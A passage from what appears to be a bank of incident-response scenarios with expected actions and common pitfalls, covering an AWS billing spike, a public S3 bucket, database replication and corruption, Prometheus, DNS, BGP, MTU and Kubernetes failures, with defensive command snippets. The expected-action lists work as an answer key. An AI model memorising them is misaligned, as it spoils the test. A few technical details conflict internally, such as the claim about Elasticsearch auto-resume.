The finance team alerts you that this month's AWS bill is $47,000 — three times the normal $15,000 monthly spend. AWS Cost Explorer shows a massive spike starting 10 days ago, concentrated in EC2 and data transfer costs. The EC2 spike is from 200+ m5.4xlarge instances running in ap-southeast-1, a region your team does not use. The instances are tagged with your organization's default tags but were launched by an IAM role used by a CI/CD system.
Expected actions
- Immediately terminate the unauthorized EC2 instances in ap-southeast-1
- Investigate the IAM role — check CloudTrail for who or what assumed the role and launched the instances
- Rotate the CI/CD IAM role credentials and review its permissions (likely over-scoped)
- Check the instances for what they were doing — crypto mining is the most common reason for unauthorized large instance launches
- Implement Service Control Policies (SCPs) to deny EC2 launches in unused regions
- Set up AWS Budgets with alerts and auto-actions (e.g., stop instances) when spend exceeds thresholds
- Enable AWS Config rules to detect non-compliant resource creation in unauthorized regions
- Request a billing adjustment from AWS if the instances were created through compromised credentials

Common pitfalls
- Only terminating the instances without investigating how they were launched — the attacker can relaunch
- Not checking all regions — if one region had unauthorized instances, others might too
- Assuming the default tags mean the instances are legitimate
- Not implementing preventive controls (SCPs, budgets) to stop recurrence

ir-scenario-043 — Cloud 🔴¶
A security scan discovers that an S3 bucket containing customer PII (names, email addresses, phone numbers) has had its bucket policy set to allow public read access. CloudTrail shows the policy was changed 14 days ago by a Terraform apply run by the infrastructure team. The change was in a PR that modified 47 resources, and the bucket policy change was not caught in review. Access logs show 3 unique external IP addresses accessed the bucket over the past 14 days, downloading a total of 2.3 GB of data.
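The CI policy check this scenario recommends (in the spirit of tfsec or OPA/Conftest rules) can be sketched as a scan over the bucket policy JSON for Allow statements open to any principal. This is a simplified sketch; a real check would also evaluate Condition blocks and other principal forms:

```python
# Sketch of a public-access check on an S3 bucket policy document: flag
# Allow statements whose Principal is "*" (or a map containing "*").
import json

def public_statements(policy_json):
    """Return Sids (or indexes) of Allow statements open to any principal."""
    policy = json.loads(policy_json)
    flagged = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        principal = stmt.get("Principal")
        wide_open = principal == "*" or (
            isinstance(principal, dict) and "*" in principal.values()
        )
        if stmt.get("Effect") == "Allow" and wide_open:
            flagged.append(stmt.get("Sid", f"statement-{i}"))
    return flagged

policy = json.dumps({"Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::pii-bucket/*"},
    {"Sid": "OpsAccess", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/ops"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::pii-bucket/*"},
]})
print(public_statements(policy))  # ['PublicRead']
```

Run against every PR, a check like this catches the one dangerous line buried in a 47-resource diff that human review missed.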
Expected actions
- Immediately restrict the bucket policy to remove public access
- Enable S3 Block Public Access at the account level to prevent future public bucket policies
- Analyze S3 access logs to identify exactly which objects were downloaded by the 3 external IPs
- Assess the scope of the data breach — number of affected customers and types of PII exposed
- Engage legal and compliance teams — this likely triggers data breach notification requirements (GDPR, CCPA, etc.)
- Notify affected customers as required by applicable regulations
- Review and fix the Terraform code that introduced the public policy
- Implement automated policy checks in CI (e.g., OPA/Conftest, tfsec) to catch public access in PRs before apply

Common pitfalls
- Treating this as only an infrastructure fix without engaging legal — data breach notification has strict timelines
- Assuming the 3 IPs were benign crawlers without investigating what data they accessed
- Fixing the Terraform without implementing preventive CI checks, relying on manual review for 47-resource PRs
- Not enabling account-level S3 Block Public Access, leaving other buckets vulnerable

ir-scenario-044 — Cloud 🟡¶
An engineer reports they cannot assume their usual IAM role. Investigation reveals that a Terraform apply modified the role's trust policy, replacing the list of trusted principals with a single account ID that does not belong to your organization. The Terraform state file shows the change was made 2 hours ago. Multiple engineers across three teams are locked out of production AWS resources. The IAM role has broad permissions including S3, RDS, and Lambda access.
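With break-glass credentials in hand, restoring the hijacked trust policy is a single `update-assume-role-policy` call; a sketch with hypothetical role name and account IDs:

```shell
# Run with break-glass credentials. Role name and principal ARN are hypothetical.
cat > trust-policy.json <<'EOF'
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": { "AWS": "arn:aws:iam::111122223333:root" },
    "Action": "sts:AssumeRole"
  }]
}
EOF

# Restore the known-good trust policy on the affected role.
aws iam update-assume-role-policy \
  --role-name prod-engineers \
  --policy-document file://trust-policy.json

# Then look for sessions the foreign account opened while it was trusted (GNU date syntax).
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "$(date -u -d '3 hours ago' +%Y-%m-%dT%H:%M:%SZ)"
```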
Expected actions
- Use a break-glass IAM user or root credentials to fix the trust policy immediately
- Restore the trust policy to its correct state with the proper principal list
- Investigate the Terraform change — review the PR, the person who approved it, and whether the state file was tampered with
- Check CloudTrail for any activity from the foreign account ID that assumed the role
- Audit all resources the role has access to for unauthorized changes during the 2-hour window
- Rotate any secrets or credentials that the role could access
- Implement Terraform plan review automation that flags trust policy changes on sensitive roles
- Add CloudWatch alarms for IAM trust policy modifications on critical roles

Common pitfalls
- Not having break-glass credentials available, leaving you unable to fix the trust policy
- Reverting Terraform without checking whether the foreign account already exploited the access
- Only fixing the trust policy without auditing what happened during the 2-hour exposure window
- Not investigating whether the Terraform state or code repository was compromised

ir-scenario-045 — Database 🔴¶
Your MySQL replica cluster is showing increasing replication lag — the primary is at binlog position 847392, but two of three replicas are lagging by 45 minutes and growing. The third replica is 3 hours behind and not catching up. Application read queries are returning stale data, and your monitoring shows that the lagging replicas have IO thread running but SQL thread frequently pausing. The primary is processing a large batch job that started 4 hours ago generating heavy write traffic.
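Diagnosis starts on a lagging replica; a sketch, using MySQL 8.0 variable and statement names (on the 5.7 series the scenario mentions, the equivalents are `SHOW SLAVE STATUS` and `slave_parallel_type`/`slave_parallel_workers`):

```shell
# Where is the applier (SQL) thread stuck, and how far behind is it?
mysql -e "SHOW REPLICA STATUS\G" | \
  grep -E 'Seconds_Behind|Replica_SQL_Running|Last_SQL_Error'

# Enable parallel apply of independent transactions to speed up replay.
# The SQL thread must be stopped to change these settings.
mysql -e "STOP REPLICA SQL_THREAD;
          SET GLOBAL replica_parallel_type = 'LOGICAL_CLOCK';
          SET GLOBAL replica_parallel_workers = 8;
          START REPLICA SQL_THREAD;"
```

The worker count (8 here) is a starting point to tune against the replica's CPU count and the batch job's transaction mix.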
Expected actions
- Check the SQL thread on lagging replicas for specific bottlenecks — single-threaded replay of large transactions is the likely cause
- Evaluate whether the batch job can be paused or throttled to reduce write pressure on the primary
- If using MySQL 5.7+, enable parallel replication (slave_parallel_workers) to speed up replay
- For the 3-hour-behind replica, assess whether it is more practical to rebuild from a fresh backup than to wait for catch-up
- Route read traffic only to the least-lagging replica or to the primary temporarily
- Add monitoring and alerting for replication lag thresholds (warn at 30s, critical at 5min)
- Reschedule future batch jobs to off-peak hours with write rate limiting
- Investigate if the batch job can be restructured to use smaller transactions

Common pitfalls
- Ignoring the lag because "it will catch up" — if the write rate exceeds replay rate, lag grows forever
- Killing the batch job abruptly, potentially leaving data in an inconsistent state
- Not routing reads away from lagging replicas, serving stale data to users
- Rebuilding all three replicas simultaneously, leaving no read capacity during the rebuild

ir-scenario-046 — Database 🔴¶
A developer reports that query results from the production PostgreSQL database are returning incorrect data — a SUM query on the orders table returns a negative total, which is impossible. Investigation reveals several rows in the orders table have corrupted numeric values. pg_amcheck reports B-tree index corruption on two indexes. The database is running on a server that experienced an unexpected power loss 3 days ago. The database came back up cleanly and no errors were reported until now.
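Scoping the corruption before any repair can look like the following, assuming PostgreSQL 14+ (where `pg_amcheck` ships with the server); the database and index names are hypothetical:

```shell
# Full-cluster check, including verifying that every heap tuple is indexed.
pg_amcheck --all --heapallindexed --progress 2>&1 | tee amcheck-report.txt

# Rebuild a corrupted index from heap data without taking an exclusive lock.
psql -d orders_db -c 'REINDEX INDEX CONCURRENTLY orders_total_idx;'

# Confirm torn-page protection is on before trusting the rebuilt state.
psql -d orders_db -c 'SHOW full_page_writes;'
```

REINDEX only helps if the heap itself is clean; if `pg_amcheck` reports heap-level damage, restore from backup instead, as the steps below describe.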
Expected actions
- Immediately take a backup of the current (corrupted) database for forensic analysis
- Run a full pg_amcheck and pg_catalog consistency check to determine the full scope of corruption
- REINDEX the corrupted indexes to rebuild them from heap data
- Verify the heap data itself is not corrupted by comparing known-good records against a recent logical backup
- If heap corruption exists, restore from the most recent known-good backup and replay WAL logs up to before the corruption point
- Check the storage subsystem for hardware issues — run SMART diagnostics on disks, check RAID controller logs
- Verify that full_page_writes is enabled in postgresql.conf (prevents torn page writes after crash)
- Implement pg_amcheck in routine maintenance and add UPS or battery-backed write cache to prevent future power-loss corruption

Common pitfalls
- Assuming the database is fine because it started cleanly after the power loss — PostgreSQL recovery does not guarantee zero corruption
- REINDEXing without first checking whether the underlying heap data is also corrupt
- Restoring a backup without verifying it predates the corruption event
- Not checking the hardware — if the disk is failing, the corruption will recur

ir-scenario-047 — Database 🟡¶
Application logs show a sudden spike in database connection errors: "FATAL: remaining connection slots are reserved for non-replication superuser connections." PgBouncer metrics show 500 active server connections (matching PostgreSQL max_connections). The application uses connection pooling via PgBouncer in transaction mode. Investigation shows that a new microservice deployed 2 hours ago opens connections but does not close them properly — it has leaked 300 connections that are in idle state, consuming the pool.
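Finding and clearing the leaked connections can be done from `psql`; a sketch, with a hypothetical `application_name` for the offending service:

```shell
# Confirm the leak: idle connections from the suspect service.
psql -d prod -c "
  SELECT pid, state, state_change
  FROM pg_stat_activity
  WHERE application_name = 'new-microservice' AND state = 'idle';"

# Free the slots. pg_terminate_backend() kills only the selected backends,
# and the age filter spares connections that just went idle.
psql -d prod -c "
  SELECT pg_terminate_backend(pid)
  FROM pg_stat_activity
  WHERE application_name = 'new-microservice'
    AND state = 'idle'
    AND state_change < now() - interval '5 minutes';"

# Auto-kill future stragglers (idle_session_timeout requires PostgreSQL 14+).
psql -d prod -c "ALTER SYSTEM SET idle_session_timeout = '10min';"
psql -d prod -c "SELECT pg_reload_conf();"
```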
Expected actions
- Identify the leaking microservice's connections using pg_stat_activity (look for idle connections from the specific application_name or client IP)
- Terminate the idle leaked connections using pg_terminate_backend() to free up slots
- Roll back or fix the leaking microservice deployment
- Configure PgBouncer with per-pool or per-user connection limits to prevent any single service from consuming the entire pool
- Set idle_in_transaction_session_timeout and idle_session_timeout in PostgreSQL to auto-kill stale connections
- Add monitoring for connection pool utilization with alerts at 70% and 90% thresholds
- Implement connection leak detection in the microservice's integration tests
- Review PgBouncer pool mode — ensure transaction mode is properly releasing connections between queries

Common pitfalls
- Increasing max_connections as a "fix" — this masks the leak and increases memory usage without solving the root cause
- Terminating all idle connections indiscriminately, potentially killing legitimate long-running transactions
- Not rolling back the leaking microservice, allowing it to re-consume freed connections within minutes
- Only fixing the immediate issue without adding pool limits to prevent future monopolization

ir-scenario-048 — Database 🔴¶
Your automated backup system for a 500 GB production PostgreSQL database has been failing silently for 18 days. The alerting was misconfigured and only checked for backup process exit code, not for actual backup file existence or size. The last valid backup is 18 days old. The database has WAL archiving enabled to S3, and WAL files are confirmed present through yesterday. The backup failure is caused by insufficient disk space on the backup server, which filled up from unrotated old backups.
Expected actions
- Immediately free disk space on the backup server by rotating or compressing old backups (after verifying the 18-day-old backup integrity)
- Take an immediate pg_basebackup or pgBackRest backup to establish a fresh baseline
- Verify the backup by restoring it to a standby server — a backup you have not tested is not a backup
- Verify WAL archive continuity from the 18-day-old backup through present — ensure no gaps exist
- Fix the backup monitoring to verify backup file existence, size, and age — not just process exit code
- Implement backup rotation policies to prevent disk space exhaustion
- Add a "last successful backup age" metric with alerting if it exceeds 24 hours
- Consider switching to pgBackRest with built-in retention management and verification

Common pitfalls
- Deleting old backups to make space without first verifying the 18-day-old backup is restorable
- Assuming WAL archiving covers the gap — WAL replay requires a base backup as a starting point
- Fixing the disk space issue without fixing the monitoring that let 18 days pass unnoticed
- Not testing the emergency backup by restoring it — you need to confirm it works before you can relax

ir-scenario-049 — Observability 🟡¶
Your Prometheus server restarted due to an OOM kill 20 minutes ago. After restart, it has a gap in all metrics from the last 2 hours because WAL replay failed and was skipped. Alertmanager did not fire during the gap because there was no data to evaluate rules against. Your team only discovered the gap when an engineer noticed the Grafana dashboards showed "No Data" for the period. During the blind spot, an application had elevated error rates that went undetected for 45 minutes.
Expected actions
- Verify Prometheus is now scraping correctly and alerts are evaluating again
- Manually check key application metrics and logs for the 2-hour blind spot period
- Investigate the application error rate issue that was missed and ensure it is now resolved
- Diagnose why Prometheus OOM'd — check cardinality explosion, expensive queries, or insufficient memory allocation
- Increase Prometheus memory limits and configure memory-based backpressure (e.g., storage.tsdb.max-block-duration)
- Implement a "dead man's switch" alert — an alert that fires when Prometheus itself stops reporting
- Add a Prometheus meta-monitoring layer (e.g., a lightweight agent that pings Prometheus health endpoint)
- Consider enabling WAL-based remote write to a secondary store for redundancy during gaps

Common pitfalls
- Assuming the Prometheus restart means everything is fine without checking what happened during the blind spot
- Not implementing dead man's switch alerting — the same gap will be invisible next time
- Only increasing memory without investigating the root cause of the OOM (cardinality, expensive queries)
- Not verifying that WAL replay works correctly after fixing the memory issue

ir-scenario-050 — Observability 🔴¶
Alertmanager is sending 2,000+ alerts per hour, overwhelming the on-call engineer's phone with notifications. The alert storm was triggered by a single network switch failure that caused 30 servers to become unreachable, firing alerts for every service, every check, and every dependent system on those servers. The actual incident (switch failure) is being drowned out by thousands of symptom alerts. The on-call engineer has muted their phone and is now missing alerts from unrelated production systems.
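A scoped silence from the CLI might look like this, assuming `amtool` can reach Alertmanager; the matcher label, regex, and comment are hypothetical:

```shell
# One silence covering the unreachable servers, not the whole pager.
amtool silence add \
  --alertmanager.url=http://alertmanager.internal:9093 \
  --author=oncall \
  --comment="switch sw-core-03 failure, INC-4821" \
  --duration=2h \
  'instance=~"(srv1[0-9]|srv2[0-9]|srv30).internal:9100"'

# List active silences to confirm the scope before walking away.
amtool silence query --alertmanager.url=http://alertmanager.internal:9093
```

The longer-term fix is an `inhibit_rules` entry in the Alertmanager config so that a node-down alert automatically suppresses service-level alerts sharing the same instance label.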
Expected actions
- Silence the symptom alerts related to the 30 unreachable servers using Alertmanager silence rules (match by server label or network segment)
- Identify and focus on the root cause alert — the network switch failure
- Engage the network team to replace or failover the switch
- Verify that silencing only affects the known-impacted servers and does not mask unrelated issues
- After the switch is restored, remove the silences and verify all services recover
- Implement alert dependency/inhibition rules — if a node is unreachable, suppress all service-level alerts for that node
- Add alert aggregation — group alerts by infrastructure segment rather than sending individual alerts
- Review alert routing to ensure critical root-cause alerts are prioritized over symptom alerts

Common pitfalls
- Muting all alerts to stop the noise, which also silences unrelated critical alerts
- Not implementing inhibition rules, guaranteeing the same alert storm on the next infrastructure failure
- Trying to acknowledge or resolve each of the 2,000 alerts individually
- Not silencing precisely enough, either too broad (missing real alerts) or too narrow (still noisy)

ir-scenario-051 — Observability 🟡¶
Your centralized logging pipeline (Filebeat -> Kafka -> Logstash -> Elasticsearch) has stopped ingesting new logs. Kibana shows the most recent log is 4 hours old. Kafka consumer group lag is growing rapidly (currently 50 million messages behind). Logstash is running but its pipeline throughput is zero. Elasticsearch cluster health is red — one data node ran out of disk space and the cluster has unassigned shards blocking writes to the affected indices.
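Once disk is freed on the data node, the write block may need to be lifted by hand; a sketch against a hypothetical cluster endpoint (Elasticsearch 7.4+ releases the block automatically when usage drops below the watermark, older versions do not):

```shell
# Lift the flood-stage write block on all indices after freeing disk.
curl -XPUT 'http://localhost:9200/_all/_settings' \
  -H 'Content-Type: application/json' \
  -d '{"index.blocks.read_only_allow_delete": null}'

# Watch shards reassign and cluster health leave red.
curl -s 'http://localhost:9200/_cluster/health?pretty'
curl -s 'http://localhost:9200/_cat/shards?v' | grep -c UNASSIGNED
```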
Expected actions
- Free disk space on the Elasticsearch data node — delete old indices, increase disk, or move shards
- Clear the Elasticsearch flood-stage watermark block on affected indices
- Verify cluster health returns to green/yellow and index writes resume
- Monitor Logstash throughput to confirm it starts processing the Kafka backlog
- Assess Kafka consumer lag — ensure consumer throughput exceeds producer rate so lag decreases
- Scale Logstash horizontally if the backlog is too large to drain before Kafka retention expires
- Implement ILM (Index Lifecycle Management) policies to auto-roll and delete old indices
- Add alerts for Elasticsearch disk usage at 70% (warn) and 85% (critical) to prevent recurrence

Common pitfalls
- Restarting Logstash repeatedly when the problem is Elasticsearch rejecting writes
- Not clearing the flood-stage watermark after freeing space — Elasticsearch does not auto-resume
- Letting the Kafka backlog exceed retention, permanently losing logs for the gap period
- Only adding disk without implementing index lifecycle management, deferring the problem

ir-scenario-052 — Observability 🔴¶
Your Prometheus instance is consuming 45 GB of memory and growing, up from 8 GB a week ago. Query performance has degraded severely. Investigation reveals that a new service deployed 5 days ago exports a metric with a label containing user IDs, creating millions of unique time series (cardinality explosion). The metric is user_request_duration with labels {method, path, user_id, status}. The user_id label alone has created 2.3 million active time series.
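Confirming and draining the cardinality explosion can be sketched as follows, assuming the TSDB admin API is enabled (`--web.enable-admin-api`) and a hypothetical Prometheus host:

```shell
# Confirm the offender: top metrics by series count from the TSDB status API.
curl -s 'http://prometheus:9090/api/v1/status/tsdb' | \
  jq '.data.seriesCountByMetricName[:5]'

# Emergency stop-gap, added to the job's scrape config (shown as reference):
#   metric_relabel_configs:
#     - source_labels: [__name__]
#       regex: user_request_duration.*
#       action: drop

# Reclaim memory: delete the existing series, then compact the tombstones.
curl -XPOST -g \
  'http://prometheus:9090/api/v1/admin/tsdb/delete_series?match[]=user_request_duration'
curl -XPOST 'http://prometheus:9090/api/v1/admin/tsdb/clean_tombstones'
```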
Expected actions
- Identify the offending metric and label using Prometheus TSDB stats or promtool
- Contact the service team and have them remove the user_id label from the metric immediately
- Drop the high-cardinality metric at ingestion using Prometheus relabeling rules as an emergency measure
- Delete the existing high-cardinality time series data using TSDB admin API to reclaim memory
- Restart Prometheus if memory does not recover after series deletion
- Implement cardinality limits — use Prometheus metric_relabel_configs or a proxy like Grafana Agent with series limiting
- Add a pre-deploy check or CI rule that rejects metrics with unbounded label values
- Educate the team on metric design — use histograms for user-level latency, not labels

Common pitfalls
- Only removing the label going forward without deleting existing series — memory stays high
- Not implementing cardinality limits, leaving the system vulnerable to the next team that adds a high-cardinality label
- Increasing Prometheus memory as a "fix" — this delays the OOM but does not solve the exponential growth
- Blocking the metric entirely without providing an alternative way for the team to track user-level latency

ir-scenario-053 — Networking 🔴¶
Multiple customers report they cannot reach your application. Internal monitoring from within the cloud provider shows the application is healthy. External uptime monitors from multiple geographic locations confirm the application is unreachable. dig queries against public DNS resolvers return SERVFAIL for your domain. Your DNS is hosted on a managed DNS provider (separate from your cloud hosting). The DNS provider's status page shows "investigating elevated error rates."
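Isolating the fault to the DNS provider can be done with `dig`; a sketch using hypothetical domain and nameserver names:

```shell
# Compare what the world sees against your authoritative servers directly.
dig example.com @1.1.1.1                              # public resolver path (SERVFAIL)
dig example.com @ns1.dnsprovider.example +norecurse   # authoritative server, no recursion

# Gauge blast radius across several public resolvers.
for r in 1.1.1.1 8.8.8.8 9.9.9.9; do
  echo "resolver $r -> $(dig +time=2 +tries=1 example.com @$r | grep -o 'status: [A-Z]*')"
done
```

If the authoritative servers answer correctly but public resolvers return SERVFAIL, the provider's resolution path (not your zone data) is the problem.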
Expected actions
- Confirm the DNS provider outage is the root cause by querying your authoritative nameservers directly
- Check if any secondary/backup nameservers are functioning and can serve queries
- Communicate to customers via channels that do not depend on your domain (social media, status page if hosted elsewhere, direct email)
- If the outage persists beyond the DNS provider's estimated fix time, prepare to migrate DNS to a backup provider
- Lower TTLs on records (once DNS is accessible again) to enable faster failover in the future
- Consider implementing DNS redundancy with a secondary DNS provider (multi-provider DNS)
- Verify all DNS records are correct once the provider recovers
- Post-incident, evaluate multi-provider DNS or self-hosted secondary nameservers for critical domains

Common pitfalls
- Assuming the problem is with your application and wasting time investigating application health
- Trying to update DNS records during the provider outage — the management API is likely also affected
- Not having DNS records documented outside the provider, making migration under pressure error-prone
- Relying on a status page hosted on the same domain that is unreachable

ir-scenario-054 — Networking 🟡¶
Users are reporting HTTPS certificate errors when accessing your application. The error is "NET::ERR_CERT_DATE_INVALID." Investigation shows that the TLS certificate for your primary domain expired 6 hours ago. Your certificate was managed by Let's Encrypt with automatic renewal via cert-manager in Kubernetes. The cert-manager logs show renewal failures for the past 30 days — the ACME HTTP-01 challenge has been failing because a recent ingress configuration change broke the challenge path routing.
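Checking the challenge path and forcing a re-issue might look like this, assuming cert-manager's `cmctl` CLI is installed; the domain, certificate, and namespace names are hypothetical:

```shell
# Is the challenge path reachable through the ingress? cert-manager serves the
# HTTP-01 token from a solver pod behind this route.
curl -i 'http://example.com/.well-known/acme-challenge/test'

# Force an immediate re-issue once routing is fixed.
cmctl renew example-com-tls -n prod

# Watch the new order and challenge progress.
kubectl get challenges -n prod -w
kubectl describe certificaterequest -n prod
```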
Expected actions
- Issue an emergency certificate — manually run certbot or use the cert-manager CLI to force renewal
- Fix the ingress configuration that broke the ACME challenge path (ensure /.well-known/acme-challenge/ routes correctly)
- If manual renewal fails, temporarily use a self-signed or purchased certificate while debugging
- Verify the new certificate is deployed and users can connect without errors
- Investigate why 30 days of cert-manager renewal failures went unnoticed
- Add monitoring for certificate expiry — alert at 30, 14, and 7 days before expiration
- Add monitoring for cert-manager renewal success/failure events
- Test the renewal process end-to-end in a staging environment after fixing the ingress

Common pitfalls
- Not fixing the ingress routing, causing the emergency certificate to also fail renewal in 90 days
- Using a self-signed certificate as a permanent fix — browsers will still show warnings
- Not investigating why 30 days of failures went unalerted — the monitoring gap is the deeper issue
- Rushing the ingress fix without testing in staging, potentially breaking other routes

ir-scenario-055 — Networking 🔴¶
Your NOC detects that traffic from certain ISPs in Southeast Asia is being routed through an unexpected AS (autonomous system) that does not belong to your hosting provider. BGP monitoring tools show an unauthorized BGP announcement for your /24 prefix from an unknown ASN. Affected users are experiencing intermittent connectivity issues and packet loss. The unauthorized route is more specific than your provider's announcement, so some networks prefer the hijacked route.
Expected actions
- Contact your upstream ISP/hosting provider immediately to announce more-specific prefixes to combat the hijack
- Report the BGP hijack to the offending ASN's abuse contact and their upstream providers
- Register your prefix in appropriate IRR (Internet Routing Registry) databases if not already done
- Implement RPKI (Resource Public Key Infrastructure) ROAs for your prefixes to enable route origin validation
- Monitor BGP looking glasses and route collectors (RIPE RIS, RouteViews) to track the hijack's propagation
- Communicate with affected users about potential traffic interception and recommend VPN usage temporarily
- Work with your ISP to implement BGP route filtering based on IRR/RPKI
- Post-incident, evaluate BGP monitoring services for continuous prefix monitoring

Common pitfalls
- Assuming this is a transient routing issue and waiting for it to resolve — BGP hijacks may be intentional
- Not considering that intercepted traffic may have been captured (MITM) — this is a potential data breach
- Only contacting the offending ASN without also working with your own upstream to announce countermeasures
- Not implementing RPKI, leaving your prefixes vulnerable to future hijacks

ir-scenario-056 — Networking 🟡¶
Users on a specific internal network segment report that large file uploads and certain API responses are failing with connection resets. Small requests work fine. Investigation shows the issue started after a network team change to enable jumbo frames (MTU 9000) on the core switches. The path between the application servers and the users crosses a VPN tunnel that has an MTU of 1400. Path MTU Discovery is being blocked because the intermediate firewall drops ICMP "Fragmentation Needed" packets.
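The mismatch can be demonstrated and worked around from a shell; a sketch assuming Linux `ping` and `iptables` on the VPN endpoints, with a hypothetical hostname:

```shell
# Probe the path MTU with Don't-Fragment set: -s is ICMP payload,
# so 1372 + 8 (ICMP) + 20 (IP) = a 1400-byte packet.
ping -c 3 -M do -s 1372 app.internal.example   # fits the 1400-byte tunnel
ping -c 3 -M do -s 1472 app.internal.example   # 1500-byte packet; fails on this path

# Workaround until ICMP type 3 code 4 is allowed through the firewall:
# clamp TCP MSS so endpoints never build segments too large for the tunnel.
iptables -t mangle -A FORWARD -p tcp --tcp-flags SYN,RST SYN \
  -j TCPMSS --set-mss 1360   # 1400 minus 40 bytes of IP+TCP headers
```

MSS clamping only fixes TCP; non-TCP protocols still need PMTUD, which is why unblocking the ICMP messages remains the real fix.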
Expected actions
- Identify the MTU mismatch — jumbo frames (9000) on the core, 1400 on the VPN tunnel
- Configure the firewall to allow ICMP type 3 code 4 (Fragmentation Needed/Packet Too Big) messages
- As an immediate workaround, lower the MSS clamping on the VPN endpoints to 1360 (1400 - 40 bytes overhead)
- Verify large transfers work after the fix by testing with specific payload sizes
- If ICMP cannot be unblocked quickly, set the server-side MTU or MSS to accommodate the smallest path MTU
- Document the network path MTUs and establish a policy for MTU changes that includes path validation
- Add monitoring for TCP retransmission rates on the affected network segment
- Test the jumbo frame change end-to-end across all network paths before re-enabling on the core

Common pitfalls
- Reverting the jumbo frames change entirely instead of fixing the actual ICMP filtering issue
- Not testing all network paths — the VPN tunnel is one bottleneck but there may be others
- Blaming the application for connection resets without investigating the network layer
- Blocking all ICMP at the firewall "for security" without understanding that PMTUD depends on it

ir-scenario-057 — Kubernetes 🔴¶
A container image vulnerability scan reveals that your production workload is running an nginx base image with a critical CVE that allows remote code execution. The image is deployed across 15 services in production. The vulnerable nginx version is 1.21.3 and the fix requires upgrading to 1.21.7+. The services use a shared base image from your internal registry that has not been updated in 8 months. Three of the 15 services have not been deployed in 6 months and their CI pipelines are broken.
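Verifying which images carry the CVE and rebuilding the base can be sketched with a scanner such as Trivy (one option among several; the registry paths are hypothetical, and the build assumes the Dockerfile accepts an NGINX_VERSION build arg):

```shell
# Confirm the critical findings on the current shared base.
trivy image --severity CRITICAL registry.internal/base/nginx:1.21.3

# Rebuild the shared base on the patched nginx and push it for the 15 services.
docker build -t registry.internal/base/nginx:1.21.7 \
  --build-arg NGINX_VERSION=1.21.7 .
docker push registry.internal/base/nginx:1.21.7
```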
Expected actions
- Assess exploitation risk — is nginx directly exposed or behind a WAF/reverse proxy that may mitigate the CVE
- Update the shared base image to use the patched nginx version and push to the internal registry
- Rebuild and redeploy the 12 services with working CI pipelines using the updated base image
- For the 3 services with broken pipelines, fix the pipelines or manually build and deploy updated images
- Implement a WAF rule to mitigate the CVE for services that cannot be immediately patched
- Set up automated base image scanning and rebuild triggers when critical CVEs are published
- Establish a policy that base images must be rebuilt at least monthly
- Audit all other base images in the registry for similar staleness issues

Common pitfalls
- Patching only the directly exposed services while leaving 12 others vulnerable on internal networks
- Ignoring the 3 services with broken pipelines because they are "too hard to fix right now"
- Updating the base image without testing that the nginx upgrade does not break application configs
- Not implementing automated scanning and rebuild policies, leading to the same 8-month staleness again

ir-scenario-058 — Kubernetes 🔴¶
Your Kubernetes cluster's etcd cluster has lost quorum. Two of three etcd members are reporting "cluster ID mismatch" errors after a failed etcd upgrade attempt. The Kubernetes API server is returning "etcdserver: leader changed" errors and then becomes completely unresponsive. Existing pods continue to run but no new scheduling, scaling, or deployments are possible. Kubectl commands timeout. The etcd data directory is on local SSDs with no recent snapshot.
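Read-only triage comes first; a sketch of the `etcdctl` commands, with hypothetical endpoints and certificate paths:

```shell
# Compare members before touching anything: raft index and revision tell you
# which member holds the most recent, consistent data.
ETCDCTL_API=3 etcdctl \
  --endpoints=https://10.0.0.1:2379,https://10.0.0.2:2379,https://10.0.0.3:2379 \
  --cacert=/etc/etcd/ca.crt --cert=/etc/etcd/client.crt --key=/etc/etcd/client.key \
  endpoint status --write-out=table

# Preserve whatever state exists before any repair attempt.
ETCDCTL_API=3 etcdctl \
  --endpoints=https://10.0.0.1:2379 \
  --cacert=/etc/etcd/ca.crt --cert=/etc/etcd/client.crt --key=/etc/etcd/client.key \
  snapshot save /backup/etcd-$(date +%s).db
```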
Expected actions
- Do NOT restart or delete etcd members hastily — this can cause permanent data loss
- Identify which etcd member has the most recent and consistent data by checking revision numbers
- If one healthy member exists, restore quorum by removing the corrupted members and re-adding them with fresh data directories
- If no member is healthy, restore from the most recent etcd snapshot (check automated backup location)
- If no snapshot exists, attempt to recover data from the etcd data directory of the most recent member using etcdctl snapshot save
- Once etcd quorum is restored, verify the Kubernetes API server reconnects and cluster state is consistent
- Implement automated etcd snapshots (every 30 minutes minimum) stored off-cluster
- Add etcd health monitoring with alerts for member connectivity, leader elections, and revision delta between members

Common pitfalls
- Restarting all etcd members simultaneously, which can cause the cluster to form a new empty cluster
- Deleting etcd data directories to "start fresh" — this destroys all cluster state (deployments, services, secrets)
- Not having automated etcd backups — this turns a recoverable incident into a catastrophic data loss
- Attempting the failed upgrade procedure again without understanding why it failed the first time

ir-scenario-059 — Kubernetes 🟡¶
A PersistentVolume backed by an EBS volume in AWS has become "stuck" in a Released state after its PersistentVolumeClaim was accidentally deleted. The PV contains 200 GB of production data for a StatefulSet (Elasticsearch data node). The StatefulSet pod is in Pending state because the PVC no longer exists and a new PVC cannot bind to the Released PV. The EBS volume still exists in AWS and the data is intact.
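The recovery maps to a few `kubectl patch` calls; a sketch with hypothetical PV and PVC names:

```shell
# Guard first: a recovery mistake must not be able to delete the EBS volume.
kubectl patch pv pv-es-data-0 \
  -p '{"spec":{"persistentVolumeReclaimPolicy":"Retain"}}'

# Clear the stale claim reference; the PV moves from Released to Available.
kubectl patch pv pv-es-data-0 --type=json \
  -p '[{"op":"remove","path":"/spec/claimRef"}]'

kubectl get pv pv-es-data-0 -o jsonpath='{.status.phase}'   # expect Available

# Recreate the PVC under the name the StatefulSet expects (e.g. data-es-data-0),
# with matching storage class and capacity, so the Pending pod can bind.
kubectl apply -f restored-pvc.yaml
```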
Expected actions
- Verify the EBS volume still exists and note its volume ID
- Edit the PersistentVolume to remove the claimRef field, changing its status from Released to Available
- Create a new PVC with the same name, storage class, and capacity that matches the PV
- If using static provisioning, ensure the PV's persistentVolumeReclaimPolicy is set to Retain (not Delete)
- Verify the PVC binds to the PV and the StatefulSet pod starts and mounts the volume
- Check Elasticsearch cluster health to confirm the data node rejoins with its data intact
- Add documentation for PV recovery procedures in the team runbook
- Implement RBAC policies to restrict PVC deletion on production namespaces

Common pitfalls
